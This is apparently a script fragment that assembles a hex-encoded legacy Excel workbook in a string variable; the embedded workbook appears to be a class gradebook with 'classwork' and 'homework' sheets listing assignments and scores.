\nwD+=\"c14c00000046c1240000007f0101000100810141000008bf0100001000c00140000008ff011\" \nwD+=\"000100013001300f0ff000000000c001a00180034002d003500420036006e000b007c000700\" \nwD+=\"8a0003007a001f0080001f0086001f008f0002009e000600ad000a00c6003a00db003a00f00\" \nwD+=\"03a0014010e001e0106000f0010000200004000ad012000ad012000ad012000ad012000ad01\" \nwD+=\"2000ad012000ac0080000010f012000000000004000b0012005a00080050031500c40000001\" \nwD+=\"1f0000000005d001a00150012001e000a00116000000000bc0c92010000000000000000ec00\" \nwD+=\"28002f0005f020000000000017f0080000000200000004140000000017f0080000000400000\" \nwD+=\"0051400003e021200b606000000004000000000000000000000001d000f0003020004000000\" \nwD+=\"0100020002000404ef00060005003700000067081700670800000000000000000000020001f\" \nwD+=\"fffffff004000000a0000000908100000061000e228cd07c9c00000060200000b0218000000\" \nwD+=\"000001000000290000000c230000cb2f00002f3000000d00020001000c00020064000f00020\" \nwD+=\"0010011000200000010000800fca9f1d24d62503f5f00020001002a00020000002b00020000\" \nwD+=\"00820002000100800008000000000000000000250204000000ff0081000200c104140000001\" \nwD+=\"5000000830002000000840002000000a10022000000ff000100010001000400020001ff0000\" \nwD+=\"00000000e03f000000000000e03f0400120002000100dd00020001006300020001005500020\" \nwD+=\"008007d000c0000000000b6170f00020004007d000c0001000100920f0f00020004007d000c\" \nwD+=\"0008000800db0b0f00060004007d000c000d000d00b60a0f00060004009b0000009d0002000\" \nwD+=\"1009e00220000000400060218433601090100000000000000000000000000636c617373776f\" \nwD+=\"726b00020e00010000002900000000000e00000008021000010000000a00ff0000000000000\" \nwD+=\"10f0008021000020000000a00ff000000000020010f0008021000030000000a00ff00000000\" \nwD+=\"0020010f0008021000040000000a00ff000000000000010f0008021000050000000a00ff000\" \nwD+=\"000000020010f0008021000060000000a00ff000000000020010f0008021000070000000a00\" \nwD+=\"ff000000000020010f0008021000080000000a00ff000000000020010f00080210000900000\" \nwD+=\"00a00ff000000000020010f00080210000a0000000a00ff000000000020010f00080210000b\" \nwD+=\"0000000a00ff000000000020010f00080210000c0000000a00ff000000000020010f0008021\" \nwD+=\"0000d0000000a00ff000000000000010f00080210000e0000000a00ff000000000000010f00\" \nwD+=\"080210000f0000000a00ff000000000000010f0008021000100000000800ff0000000000000\" \nwD+=\"10f0008021000110000000800ff000000000020010f0008021000120000000800ff00000000\" \nwD+=\"0020010f0008021000130000000800ff000000000020010f0008021000140000000800ff000\" \nwD+=\"000000020010f0008021000150000000800ff000000000000010f0008021000160000000800\" \nwD+=\"ff000000000000010f0008021000170000000800ff000000000020010f00080210001800000\" \nwD+=\"00800ff000000000020010f0008021000190000000800ff000000000000010f00080210001a\" \nwD+=\"0000000800ff000000000020010f00080210001b0000000800ff000000000020010f0008021\" \nwD+=\"0001c0000000800ff000000000020010f00080210001d0000000800ff000000000020010f00\" \nwD+=\"080210001e0000000800ff000000000020010f00080210001f0000000800ff0000000000000\" \nwD+=\"10f00fd000a00010000000f0000000000fd000a00010001000f0001000000fd000a00010002\" \nwD+=\"000f0002000000fd000a00010003000f004b000000fd000a00010004000f0047000000fd000\" \nwD+=\"a00010005000f0048000000fd000a00010006000f0049000000fd000a00010007000f004a00\" \nwD+=\"0000fd000a00010008000f0029000000fd000a00020000000f0021000000fd000a000200010\" \nwD+=\"00f00220000007e020a00020002000f000000594003020e0002000800170014b742712b1451\" \nwD+=\"4003020e0002000900170014b742712b145140fd000a00030000000f0003000000fd000a000\" \nwD+=\"30001000f00090000007e020a00030002000f0000005940fd000a00030008000f0029000000\" \nwD+=\"fd000a00030009000f0029000000fd000a00040000000f0004000000fd000a00040001000f0\" \nwD+=\"00a0000007e020a0004000200250000004b40060047000400030025000000000000004b4020\" \nwD+=\"001f0007fe310024040002c0240d0002c0240e0002c0240f0002c024100002c024150002c02\" \nwD+=\"4160002c024190002c0241f0002c04209e300060047000400040026009ff4499ff4494c4020\" \nwD+=\"00040006ff310024040002c0240d0002c0240e0002c0240f0002c024100002c024150002c02\" \nwD+=\"4160002c024190002c0241f0002c04209050006004700040005002500f46ae259d16c954020\" \nwD+=\"000f0008ff310024040002c0240d0002c0240e0002c0240f0002c024100002c024150002c02\" \nwD+=\"4160002c024190002c0241f0002c042092e000600470004000600250055db59c2cf83424020\" \nwD+=\"00040007ff310024040002c0240d0002c0240e0002c0240f0002c024100002c024150002c02\" \nwD+=\"4160002c024190002c0241f0002c042090c000600280004000700250047c9462533d2b1bf20\" \nwD+=\"00040005ff120044040002c044040004c0041544040006c0067e020a0004000800170000805\" \nwD+=\"14001020600040009001700fd000a00050000000f0005000000fd000a00050001000f000b00\" \nwD+=\"00007e020a00050002000f0000004940fd000a00060000000f0006000000fd000a000600010\" \nwD+=\"00f00090000007e020a00060002000f0000c05040fd000a00070000000f0007000000fd000a\" \nwD+=\"00070001000f00090000007e020a00070002000f0000004440fd000a00080000000f0008000\" \nwD+=\"000fd000a00080001000f000c0000007e020a00080002000f0000004940fd000a0009000000\" \nwD+=\"0f000d000000fd000a00090001000f000b0000007e020a00090002000f0000005440fd000a0\" \nwD+=\"00a0000000f000e000000fd000a000a0001000f000c0000007e020a000a0002000f00008051\" \nwD+=\"40fd000a000b0000000f0011000000fd000a000b0001000f000b0000007e020a000b0002000\" \nwD+=\"f0000005940fd000a000c0000000f000f000000fd000a000c0001000f00090000007e020a00\" \nwD+=\"0c0002000f0000005940fd000a000d0000000f0023000000fd000a000d0001000f000a00000\" \nwD+=\"07e020a000d0002000f00000034407e020a000d0004000f0000004f4003020e000d0006000f\" \nwD+=\"0043e7357689da4340060028000d0007000f00410b953b80ecf0bf0000040004ff1200440d0\" \nwD+=\"002c0440d0004c00415440d0006c006fd000a000e0000000f0010000000fd000a000e000100\" \nwD+=\"0f000a0000007e020a000e0002000f00000049407e020a000e0004000f0000004f4003020e0\" \nwD+=\"00e0006000f0043e7357689da4340060028000e0007000f00937af3fa6d57d3bf00000d0007\" \nwD+=\"ff1200440e0002c0440e0004c00415440e0006c006fd000a000e0008001e0045000000fd000\" \nwD+=\"a000e0009001e002a000000fd000a000f0000000f0012000000fd000a000f0001000f000a00\" \nwD+=\"00007e020a000f0002000f000198c2407e020a000f0004000f0000004f4003020e000f00060\" \nwD+=\"00f0043e7357689da4340060028000f0007000f00f7cfd0457ac1ea3f00000e0007ff120044\" \nwD+=\"0f0002c0440f0004c00415440f0006c006060023000f0008001b00cdcccccccccc284000003\" \nwD+=\"00637fd0d001fd7a3703d0ad7e33f1e1400057e020a000f0009001f0000003440fd000a0010\" \nwD+=\"0000000f0013000000fd000a00100001000f000a0000007e020a00100002000f00000034407\" \nwD+=\"e020a00100004000f0000004f4003020e00100006000f0043e7357689da4340060028001000\" \nwD+=\"07000f00410b953b80ecf0bf00000f0007ff120044100002c044100004c0041544100006c00\" \nwD+=\"6fd000a00110000000f0014000000fd000a00110001000f000c0000007e020a00110002000f\" \nwD+=\"0000c05240fd000a00120000000f0015000000fd000a00120001000f00090000007e020a001\" \nwD+=\"20002000f0000005940fd000a00130000000f0016000000fd000a00130001000f0009000000\" \nwD+=\"7e020a00130002000f0000000000fd000a00140000000f0017000000fd000a00140001000f0\" \nwD+=\"0090000007e020a00140002000f0000000000fd000a00150000000f0018000000fd000a0015\" \nwD+=\"0001000f000a0000007e020a00150002000f00000059407e020a00150004000f0000004f400\" \nwD+=\"3020e00150006000f0043e7357689da434006002800150007000f0014820178c39fee3f0000\" \nwD+=\"100007ff120044150002c044150004c0041544150006c006fd000a00160000000f001900000\" \nwD+=\"0fd000a00160001000f000a0000007e020a00160002000f00000054407e020a00160004000f\" \nwD+=\"0000004f4003020e00160006000f0043e7357689da434006002800160007000f00dd376df82\" \nwD+=\"403dd3f0000150007ff120044160002c044160004c0041544160006c006fd000a0017000000\" \nwD+=\"0f001a000000fd000a00170001000f00090000007e020a00170002000f0000005940fd000a0\" \nwD+=\"0180000000f001b000000fd000a00180001000f00090000007e020a00180002000f00000000\" \nwD+=\"00fd000a00190000000f001c000000fd000a00190001000f000a0000007e020a00190002000\" \nwD+=\"f00000000007e020a00190004000f0000004f4003020e00190006000f0043e7357689da4340\" \nwD+=\"06002800190007000f00537e7ab998fbf8bf0000160007ff120044190002c044190004c0041\" \nwD+=\"544190006c006fd000a001a0000000f001d000000fd000a001a0001000f000c0000007e020a\" \nwD+=\"001a0002000f0000005440fd000a001b0000000f001d000000fd000a001b0001000f000c000\" \nwD+=\"0007e020a001b0002000f0000005440fd000a001c0000000f001e000000fd000a001c000100\" \nwD+=\"0f00090000007e020a001c0002000f0000005940fd000a001d0000000f001f000000fd000a0\" \nwD+=\"01d0001000f000b0000007e020a001d0002000f0000004440fd000a001e0000000f00200000\" \nwD+=\"00fd000a001e0001000f00090000007e020a001e0002000f0000005940fd000a001f0000000\" \nwD+=\"f001e000000fd000a001f0001000f000a0000007e020a001f0002000f00008056407e020a00\" \nwD+=\"1f0004000f0000004f4003020e001f0006000f0043e7357689da4340060028001f0007000f0\" \nwD+=\"0010f1cfaaa90e63f0000190007ff1200441f0002c0441f0004c00415441f0006c006d70042\" \nwD+=\"00370c000058027e004e0046009a012a002a002a002a002a002a002a002a0076009200ab007\" \nwD+=\"6002a002a002a002a00760076002a002a0076002a002a002a002a002a000802100028000d00\" \nwD+=\"0e00ff000000000000010f000102060028000d001700d70006001e0000000000c20118001f0\" \nwD+=\"00400020009070300010f08000f0005000903080007ffec00aa000f0002f03e020000200008\" \nwD+=\"f00800000005000000040400000f0003f00e0200000f0004f028000000010009f0100000000\" \nwD+=\"000000000000000000000000000000002000af00800000000040000050000000f0004f05200\" \nwD+=\"0000920c0af00800000001040000000a000043000bf0180000007f0004010401bf000800080\" \nwD+=\"0ff0100000800bf0300000200000010f0120000000100010000000100000002000000020000\" \nwD+=\"00000011f0000000005d00460015001200140001000121000000006c129201000000000c001\" \nwD+=\"40000000000000000000000010008000000100000001300ee1f000008000400010300000a00\" \nwD+=\"1400570000000000ec0072000f0004f06a000000920c0af00800000002040000000a0000830\" \nwD+=\"00bf0300000007f0004010401bf000800080081014e00000883014d000008bf0110001000c0\" \nwD+=\"014d000008ff01080008003f0200000200000010f012000000000000004101210000000c00a\" \nwD+=\"0023700d300000011f0000000005d001a001500120005000200116000000000381392010000\" \nwD+=\"0000000000000908100000062000e228cd07c9c000000602000014000000150000008300020\" \nwD+=\"000008400020000004d006a0300004500700073006f006e0020005300740079006c00750073\" \nwD+=\"00200043004f004c004f005200200036003000300020004500530043002f005000200032000\" \nwD+=\"000000001040005dc008c0243ef800702000100ea0a6f08640001000f006801020001006801\" \nwD+=\"020001004c00650074007400650072000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000100000000000000020000000200000001000000300100000000000000000\" \nwD+=\"000000000000000000044494e55220000003402580053ab1e3f000000000000000000000000\" \nwD+=\"010000000000000000000000000000000800000001000000010000000000020000000400000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000dddd00000000000000000000000000000000000000000000000000000\" \nwD+=\"0000000000000000000000580000004f5350454141828202000000000000000100000000000\" \nwD+=\"000000000000000000000000000010000000000000004000000000000000000000000000000\" \nwD+=\"000000006a0000000000000003000000010000000f000000a10022000100640001000100010\" \nwD+=\"0000068016801000000000000e03f000000000000e03f010033000200030060100a00802535\" \nwD+=\"16dc000100090060100a008115e60ac80000000a0060100a008115e60ac80001000b0012000\" \nwD+=\"2000100011002000000021010000000000000000000d0bfb502e8bf230133100000a0000400\" \nwD+=\"0100010064100800000001000000010032100400000002003310000007100c0000000000000\" \nwD+=\"0ffff09004d000a101000ffffff0000000000010001004e004d003410000003100c00030001\" \nwD+=\"000c000900010000003310000051100f0000020000000007003a0000010002000d100e00000\" \nwD+=\"0050147005200410044004500511013000102000000000b003b000002001f00020002005110\" \nwD+=\"13000202000000000b003b000002001f000000010051100800030100000000000006100800f\" \nwD+=\"fff000000000000331000005f10020000003410000045100200000034100000441004000a00\" \nwD+=\"0000241002000200251020000202010000000000eaffffffcbffffff0000000000000000b10\" \nwD+=\"04d00103d0000331000004f1014000200020000000000000000000000000000000000261002\" \nwD+=\"000a0051100800000100000000000034100000241002000300251020000202010000000000e\" \nwD+=\"affffffcbffffff0000000000000000b1004d00103d0000331000004f101400020002000000\" \nwD+=\"0000000000000000000000000000261002000b0051100800000100000000000034100000461\" \nwD+=\"00200010041101200000062010000e0030000820b000005060000331000004f101400020002\" \nwD+=\"002c000000ed020000b90c0000490c00001d101200000000000000000000000000000000000\" \nwD+=\"000331000002010080001aaaaaa010001006210120000000000010000000100000000000000\" \nwD+=\"ef001e101e000200030100000000000000000000000000000000000000000b004d005a00261\" \nwD+=\"002000900341000001d101200010000000000000000000000000000000000331000001f102a\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"00000001f011e101e0002000301000000000000000000000000000000000000000023004d00\" \nwD+=\"000021100200010007100c00000000000000ffff09004d00341000003510000032100400000\" \nwD+=\"003003310000007100c008080800000000000000017000a101000c0c0c00000000000010000\" \nwD+=\"0016004f0034100000141014000000000000000000000000000000000000000000331000001\" \nwD+=\"8100200010022100a0000000000000000000f0015101400150d00001a0600007a0200009101\" \nwD+=\"000003011f00331000004f10140005000200150d00001a06000000000000000000002510200\" \nwD+=\"00202010000000000eaffffffcbffffff0000000000000000b1004d0030090000331000004f\" \nwD+=\"101400020002000000000000000000000000000000000051100800000100000000000034100\" \nwD+=\"000341000003410000034100000251020000202010000000000a9060000540000004a020000\" \nwD+=\"e501000081004d0080300000331000004f101400020002000000000000000000860000002e0\" \nwD+=\"00000261002000a005110080000010000000000000d10180000000a0143006c006100730073\" \nwD+=\"0077006f0072006b00200027100600010000000000341000003410000000020e00000000000\" \nwD+=\"90000000000010000006510020002000402370000000000000017000163006c006100730073\" \nwD+=\"0077006f0072006b000a0038002e003600200038002e0037002000730068006500650074000\" \nwD+=\"4022f0001000000000013000163006c0061007300730077006f0072006b000a007700610072\" \nwD+=\"006d00750070002000230035000402350002000000000016000163006c00610073007300770\" \nwD+=\"06f0072006b000a0063006f006f006c00200064006f0077006e0020002300350004023d0003\" \nwD+=\"00000000001a000163006c0061007300730077006f0072006b000a007700650065006b006c0\" \nwD+=\"07900200072006500760069006500770020003100350004023d000400000000001a00016300\" \nwD+=\"6c0061007300730077006f0072006b000a007700650065006b006c007900200072006500760\" \nwD+=\"069006500770020003100360004023d000500000000001a000163006c006100730073007700\" \nwD+=\"6f0072006b000a007700650065006b006c00790020007200650076006900650077002000310\" \nwD+=\"034000402370006000000000017000163006c0061007300730077006f0072006b000a005400\" \nwD+=\"72006900670020005400770069007300740065007200200004023d000700000000001a00016\" \nwD+=\"3006c0061007300730077006f0072006b000a007700650065006b006c007900200072006500\" \nwD+=\"76006900650077002000310037000402350008000000000016000163006c006100730073007\" \nwD+=\"7006f0072006b000a006c006f0063007500730020007000610063006b006500740065100200\" \nwD+=\"010003020e000000000000000000000000004b4003020e00010000000000000000000000344\" \nwD+=\"003020e00020000000000000000000000494003020e00030000000000cdcccccccccc574003\" \nwD+=\"020e00040000000000000000000000344003020e00050000000000000000000000594003020\" \nwD+=\"e00060000000000000000000000544003020e00070000000000000000000000000003020e00\" \nwD+=\"08000000000000000000008056406510020003000a000000ec0066000f0004f066000000a20\" \nwD+=\"c0af00800000003040000000a000063000bf0240000008000784a36018b0002000000bf0008\" \nwD+=\"000800810141000008c0010c000008ff0108000800000010f01200000000000800d2001600a\" \nwD+=\"6000c0010001f00d300000011f0000000005d001a0015001200060003001160784a3601d413\" \nwD+=\"92010000000000000000ec00080000000df000000000b601120012020000000000000000260\" \nwD+=\"01000000000003c00270000576861742074797065206f66206772617068206c6f6f6b732062\" \nwD+=\"65737420616e64207768793f3c00100000001200e90011002600000000000000ec009c000f0\" \nwD+=\"004f09c00000002030af00800000004040000000a0000f3000bf05a0000008000c84a360185\" \nwD+=\"00010000008b0002000000bf0008000a0047011ca8ffff4801fb340000490125ccffff4a01c\" \nwD+=\"60b00004c01c60b00004d011ca8ffff4e01fb340000810141000008c0010c000008ff010800\" \nwD+=\"08007f0304000c00000010f01200000000000a0070010100e2000b0070031000f100000011f\" \nwD+=\"0000000005d001a00150012001e0004001160c84a3601e01492010000000000000000ec0008\" \nwD+=\"0000000df000000000b60112001202000000000000000024001000000000003c00250000225\" \nwD+=\"041535445205350454349414c22202d2d56414c55455320414e4420464f524d4154533c0010\" \nwD+=\"0000001200120111002400000000000000ec0018001f0005f010000000000017f0080000000\" \nwD+=\"2000000040400003e021200b600100000004000000000000000000000001d000f0003040003\" \nwD+=\"0000000100040004000303ef000600050037000000670817006708000000000000000000000\" \nwD+=\"20001ffffffff004000000a0000000908100000061000e228cd07c9c00000060200000b0218\" \nwD+=\"0000000000010000002b0000005b4000007e4d0000004e00000d00020001000c00020064000\" \nwD+=\"f000200010011000200000010000800fca9f1d24d62503f5f00020001002a00020000002b00\" \nwD+=\"02000000820002000100800008000000000000000000250204000000ff0081000200c104140\" \nwD+=\"0000015000000830002000000840002000000a10022000000ff000100010001000400020001\" \nwD+=\"ff000000000000e03f000000000000e03f524d120002000100dd00020001006300020001005\" \nwD+=\"500020008007d000c0000000000241b0f00020004007d000c00010001006d130f0003000400\" \nwD+=\"7d000c0008000800b60a0f00060004009b0000009d00020001009e002100000004000602c85\" \nwD+=\"a3601080100000000000000000000000000686f6d65776f726b00020e00010000002b000000\" \nwD+=\"00000f00000008021000010000000900ff000000000000010f0008021000020000000900ff0\" \nwD+=\"00000000020010f0008021000030000000900ff000000000000010f00080210000400000009\" \nwD+=\"00ff000000000020010f0008021000050000000900ff000000000020010f000802100006000\" \nwD+=\"0000900ff000000000000010f0008021000070000000900ff000000000000010f0008021000\" \nwD+=\"080000000900ff000000000020010f0008021000090000000900ff000000000020010f00080\" \nwD+=\"210000a0000000900ff000000000020010f00080210000b0000000900ff000000000020010f\" \nwD+=\"00080210000c0000000900ff000000000000010f00080210000d0000000900ff00000000002\" \nwD+=\"0010f00080210000e0000000900ff000000000020010f00080210000f0000000900ff000000\" \nwD+=\"000020010f0008021000100000000a00ff000000000020010f0008021000110000000a00ff0\" \nwD+=\"00000000020010f0008021000120000000a00ff000000000000010f0008021000130000000a\" \nwD+=\"00ff000000000000010f0008021000140000000a00ff000000000000010f000802100015000\" \nwD+=\"0000a00ff000000000020010f0008021000160000000a00ff000000000020010f0008021000\" \nwD+=\"170000000a00ff000000000000010f0008021000180000000a00ff000000000000010f00080\" \nwD+=\"21000190000000a00ff000000000020010f00080210001a0000000a00ff000000000020010f\" \nwD+=\"00080210001b0000000a00ff000000000020010f00080210001c0000000a00ff00000000000\" \nwD+=\"0010f00080210001d0000000a00ff000000000020010f00080210001e0000000a00ff000000\" \nwD+=\"000000010f00080210001f0000000a00ff000000000020010f00fd000a00010000000f00000\" \nwD+=\"00000fd000a00010001000f0001000000fd000a00010002000f0002000000fd000a00010003\" \nwD+=\"000f0047000000fd000a00010004000f0032000000fd000a00010005000f004c000000fd000\" \nwD+=\"a00010006000f004d000000fd000a00010007000f004e000000fd000a00020000000f002100\" \nwD+=\"0000fd000a00020001000f00220000007e020a00020002000f000000594003020e000200080\" \nwD+=\"01700577cc5577cc53240fd000a00030000000f0003000000fd000a00030001000f00090000\" \nwD+=\"007e020a00030002000f0000405940060051000300030026003c25c85382fc50400000a8073\" \nwD+=\"7fd3b0024030002c024060002c024070002c0240c0002c024120002c024130002c024140002\" \nwD+=\"c024170002c024180002c0241c0002c0241e0002c0420b050006005a000300040025009a999\" \nwD+=\"99999d953400000130008ff440024030002c024060002c0250600070002c002c024060002c0\" \nwD+=\"240c0002c024130002c024120002c024140002c024170002c024180002c0241c0002c0241e0\" \nwD+=\"002c0420ce30006005100030005002500a3554c5ac5949f400000030004ff3b0024030002c0\" \nwD+=\"24060002c024070002c0240c0002c024120002c024130002c024140002c024170002c024180\" \nwD+=\"002c0241c0002c0241e0002c0420b2e000600510003000600250040bc8129957a4640000003\" \nwD+=\"0005ff3b0024030002c024060002c024070002c0240c0002c024130002c024120002c024140\" \nwD+=\"002c024170002c024180002c0241c0002c0241e0002c0420b0c00060028000300070025008a\" \nwD+=\"ddf0a40f87e73f0000030006ff120044030002c044030003c0041544030006c006fd000a000\" \nwD+=\"30008001c0029000000fd000a00040000000f0004000000fd000a00040001000f000a000000\" \nwD+=\"7e020a00040002000f000000594003020e00040008001d0014b742712b145140fd000a00050\" \nwD+=\"000000f0005000000fd000a00050001000f000b0000007e020a00050002000f0000004940fd\" \nwD+=\"000a00050008001c0029000000fd000a00060000000f0006000000fd000a00060001000f000\" \nwD+=\"9000000bd001200060002000f0000c050400f0000005140030003020e00060006000f004304\" \nwD+=\"1c42957a464006002800060007000f0037f4c8e6e7c696bf0000030007ff120044060002c04\" \nwD+=\"4060003c0041544060006c0067e020a00060008001d0000805140fd000a00070000000f0007\" \nwD+=\"000000fd000a00070001000f0009000000bd001200070002000f000104bf400f00000051400\" \nwD+=\"30003020e00070006000f0043041c42957a464006002800070007000f006994d53a853ad03f\" \nwD+=\"0000060007ff120044070002c044070003c0041544070006c006fd000a00080000000f00080\" \nwD+=\"00000fd000a00080001000f000c0000007e020a00080002000f0000004940fd000a00090000\" \nwD+=\"000f000d000000fd000a00090001000f000b0000007e020a00090002000f0000005440fd000\" \nwD+=\"a000a0000000f000e000000fd000a000a0001000f000c0000007e020a000a0002000f000080\" \nwD+=\"5140fd000a000b0000000f0011000000fd000a000b0001000f000b0000007e020a000b00020\" \nwD+=\"00f0000005940fd000a000c0000000f000f000000fd000a000c0001000f0009000000bd0012\" \nwD+=\"000c0002000f00000059400f0000005140030003020e000c0006000f0043041c42957a46400\" \nwD+=\"60028000c0007000f0037f4c8e6e7c6e63f0000070007ff1200440c0002c0440c0003c00415\" \nwD+=\"440c0006c006fd000a000d0000000f0023000000fd000a000d0001000f000a0000007e020a0\" \nwD+=\"00d0002000f0000003440fd000a000e0000000f0010000000fd000a000e0001000f000a0000\" \nwD+=\"007e020a000e0002000f0000004940fd000a000f0000000f0012000000fd000a000f0001000\" \nwD+=\"f000a0000007e020a000f0002000f0000004940fd000a00100000000f0013000000fd000a00\" \nwD+=\"100001000f000a0000007e020a00100002000f0000003440fd000a00110000000f001400000\" \nwD+=\"0fd000a00110001000f000c0000007e020a00110002000f0000c05240fd000a00120000000f\" \nwD+=\"0015000000fd000a00120001000f0009000000bd001200120002000f00000059400f0000005\" \nwD+=\"140030003020e00120006000f0043041c42957a464006002800120007000f0037f4c8e6e7c6\" \nwD+=\"e63f00000c0007ff120044120002c044120003c0041544120006c006fd000a0012000800200\" \nwD+=\"026000000fd000a001200090020002a000000fd000a00130000000f0016000000fd000a0013\" \nwD+=\"0001000f0009000000bd001200130002000f00000000000f0000005140030003020e0013000\" \nwD+=\"6000f0043041c42957a464006002800130007000f007a8335655633f8bf0000120007ff1200\" \nwD+=\"44130002c044130003c0041544130006c006060023001300080027006766666666663440000\" \nwD+=\"0030003ff0d001fc3f5285c8fc2e53f1e1e00057e020a0013000900200000003e40fd000a00\" \nwD+=\"140000000f0017000000fd000a00140001000f0009000000bd001200140002000f000000000\" \nwD+=\"00f0000005140030003020e00140006000f0043041c42957a464006002800140007000f007a\" \nwD+=\"8335655633f8bf0000130007ff120044140002c044140003c0041544140006c006fd000a001\" \nwD+=\"50000000f0018000000fd000a00150001000f000a0000007e020a00150002000f0000005940\" \nwD+=\"fd000a00160000000f0019000000fd000a00160001000f000a0000007e020a00160002000f0\" \nwD+=\"000005440fd000a00170000000f001a000000fd000a00170001000f0009000000bd00120017\" \nwD+=\"0002000f00000059400f0000005140030003020e00170006000f0043041c42957a464006002\" \nwD+=\"800170007000f0037f4c8e6e7c6e63f0000140007ff120044170002c044170003c004154417\" \nwD+=\"0006c006fd000a00180000000f001b000000fd000a00180001000f0009000000bd001200180\" \nwD+=\"002000f00000000000f0000005140030003020e00180006000f0043041c42957a4640060028\" \nwD+=\"00180007000f007a8335655633f8bf0000170007ff120044180002c044180003c0041544180\" \nwD+=\"006c006fd000a00190000000f001c000000fd000a00190001000f000a0000007e020a001900\" \nwD+=\"02000f0000000000fd000a001a0000000f001d000000fd000a001a0001000f000c0000007e0\" \nwD+=\"20a001a0002000f0000005440fd000a001b0000000f001d000000fd000a001b0001000f000c\" \nwD+=\"0000007e020a001b0002000f0000005440fd000a001c0000000f001e000000fd000a001c000\" \nwD+=\"1000f0009000000bd0012001c0002000f00000059400f0000005140030003020e001c000600\" \nwD+=\"0f0043041c42957a4640060028001c0007000f0037f4c8e6e7c6e63f0000180007ff1200441\" \nwD+=\"c0002c0441c0003c00415441c0006c006fd000a001d0000000f001f000000fd000a001d0001\" \nwD+=\"000f000b0000007e020a001d0002000f0000004440fd000a001e0000000f0020000000fd000\" \nwD+=\"a001e0001000f0009000000bd0012001e0002000f00000059400f0000005140030003020e00\" \nwD+=\"1e0006000f0043041c42957a4640060028001e0007000f0037f4c8e6e7c6e63f00001c0007f\" \nwD+=\"e1200441e0002c0441e0003c00415441e0006c006fd000a001f0000000f001e000000fd000a\" \nwD+=\"001f0001000f000a0000007e020a001f0002000f0000805640d7004200ac0c0000580270003\" \nwD+=\"c00c1013c0038007e0070002a002a002a002a0070002a002a002a002a002a008c00a5007000\" \nwD+=\"2a002a00700070002a002a002a0070002a0070000802100029000e000f00ff0000000000000\" \nwD+=\"10f00080210002a000e000f00ff000000000000010f000102060029000e001700010206002a\" \nwD+=\"000e001700d70008003c00000014000a00c2011800110003000100090803000080040013000\" \nwD+=\"2000903080007feec00aa000f0002f014010000300008f00800000003000000030800000f00\" \nwD+=\"03f0fc0000000f0004f028000000010009f0100000000000000000000000000000000000000\" \nwD+=\"002000af00800000000080000050000000f0004f052000000920c0af0080000000108000000\" \nwD+=\"0a000043000bf0180000007f0004010401bf0008000800ff0100000800bf030000020000001\" \nwD+=\"0f012000000010001000000010000000200000002000000000011f0000000005d0046001500\" \nwD+=\"120014000100012100000000ac199201000000000c001400000000000000000000000100080\" \nwD+=\"00000100000001300ee1f000008000500010300000a001400570000000000ec0072000f0004\" \nwD+=\"f06a000000920c0af00800000003080000000a000083000bf0300000007f0004010401bf000\" \nwD+=\"800080081014e00000883014d000008bf0110001000c0014d000008ff01080008003f020000\" \nwD+=\"0200000010f0120000000000000097002200c4000d00b0013b009700000011f0000000005d0\" \nwD+=\"01a001500120005000300116000000000781a920100000000000000000908100000062000e2\" \nwD+=\"28cd07c9c00000060200001400000015000000830002000000840002000000a100220000001\" \nwD+=\"20001000100010004000000781a000000000000e03f000000000000e03f7f00330002000300\" \nwD+=\"60100a004c1d4812dc0001000c0060100a008115e60ac80000000d0060100a008115e60ac80\" \nwD+=\"001000e00120002000100011002000000021010000000000000000000e8bfa60200403d0133\" \nwD+=\"100000a00004000100010064100800000001000000010032100400000002003310000007100\" \nwD+=\"c00000000000000ffff09004d000a101000ffffff0000000000010001004e004d0034100000\" \nwD+=\"03100c00030001000b000b00010000003310000051100f0000020000000007003a010001000\" \nwD+=\"2000d100e000000050147005200410044004500511013000102000000000b003b010002001e\" \nwD+=\"0002000200511013000202000000000b003b010002001e00000001005110080003010000000\" \nwD+=\"0000006100800ffff000000000000331000005f100200000034100000451002000000341000\" \nwD+=\"00441004001a000000241002000200251020000202010000000000eaffffffd0ffffff00000\" \nwD+=\"00000000000b1004d00103d0000331000004f10140002000200000000000000000000000000\" \nwD+=\"00000000261002000d005110080000010000000000003410000024100200030025102000020\" \nwD+=\"2010000000000eaffffffd0ffffff0000000000000000b1004d00103d0000331000004f1014\" \nwD+=\"000200020000000000000000000000000000000000261002000e00511008000001000000000\" \nwD+=\"00034100000461002000100411012000000a3020000f9030000200a0000bb04000033100000\" \nwD+=\"4f101400020002002d000000fb020000960c0000440c00001d1012000000000000000000000\" \nwD+=\"000000000000000003310000020100800010001000100010062101200000000000100000001\" \nwD+=\"00000000000000ef001e101e000200030100000000000000000000000000000000000000000\" \nwD+=\"3004d002900261002000c00341000001d101200010000000000000000000000000000000000\" \nwD+=\"331000001f102a0000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"0000000000000000000001f011e101e00020003010000000000000000000000000000000000\" \nwD+=\"00000023004d00000021100200010007100c00000000000000ffff09004d003410000035100\" \nwD+=\"00032100400000003003310000007100c008080800000000000000017000a101000c0c0c000\" \nwD+=\"000000000100000016004f00341000001410140000000000000000000000000000000000000\" \nwD+=\"00000331000001710060000009600000022100a0000000000000000000f0015101400f40c00\" \nwD+=\"00b20600009a0200009701000003011f00331000004f10140005000200f40c0000af0600000\" \nwD+=\"000000000000000251020000202010000000000eaffffffd0ffffff0000000000000000b100\" \nwD+=\"4d0030090000331000004f10140002000200000000000000000000000000000000005110080\" \nwD+=\"000010000000000003410000034100000341000003410000025102000020201000000000095\" \nwD+=\"0600006b000000a3020000f801000081004d008a300000331000004f1014000200020018000\" 